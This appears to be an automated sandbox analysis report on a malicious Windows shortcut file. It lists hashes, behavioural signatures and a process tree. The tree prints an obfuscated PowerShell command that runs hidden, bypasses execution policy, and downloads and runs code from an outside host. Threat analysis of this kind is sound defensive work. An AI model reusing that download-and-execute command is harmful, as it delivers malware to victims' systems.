Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-04-2024 14:46
Static task
static1
Behavioral task
behavioral1
Sample
DOC1718 - 17181718.lnk
Resource
win7-20240221-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
DOC1718 - 17181718.lnk
Resource
win10v2004-20240226-en
6 signatures
150 seconds
General
-
Target
DOC1718 - 17181718.lnk
-
Size
9KB
-
MD5
b2f8f92b1a74fcbe95a7a9cd50994785
-
SHA1
a124648dddeaaef25245643f98df6c50ec693b94
-
SHA256
ba41a32b699a07b7a0d7871839ef0c86a9eae01a3277c151a24d288919832fff
-
SHA512
1107e818462ad8f8f9a13f052df590c6a964a6d79aa33fc0fb91eda9ab1b05eaca64bab604834d092d57f232a188b94403125569dee9f0cdb61983a6b7c3f7e6
-
SSDEEP
192:8z5P5hm3MSBf2TL52FWGkOlRKAaqPVpVIZhVjjpOW234jXAc0y:u53cMS5ZFbkO3KYyftoy
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2596 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1660 wrote to memory of 2596 1660 cmd.exe powershell.exe PID 1660 wrote to memory of 2596 1660 cmd.exe powershell.exe PID 1660 wrote to memory of 2596 1660 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DOC1718 - 17181718.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596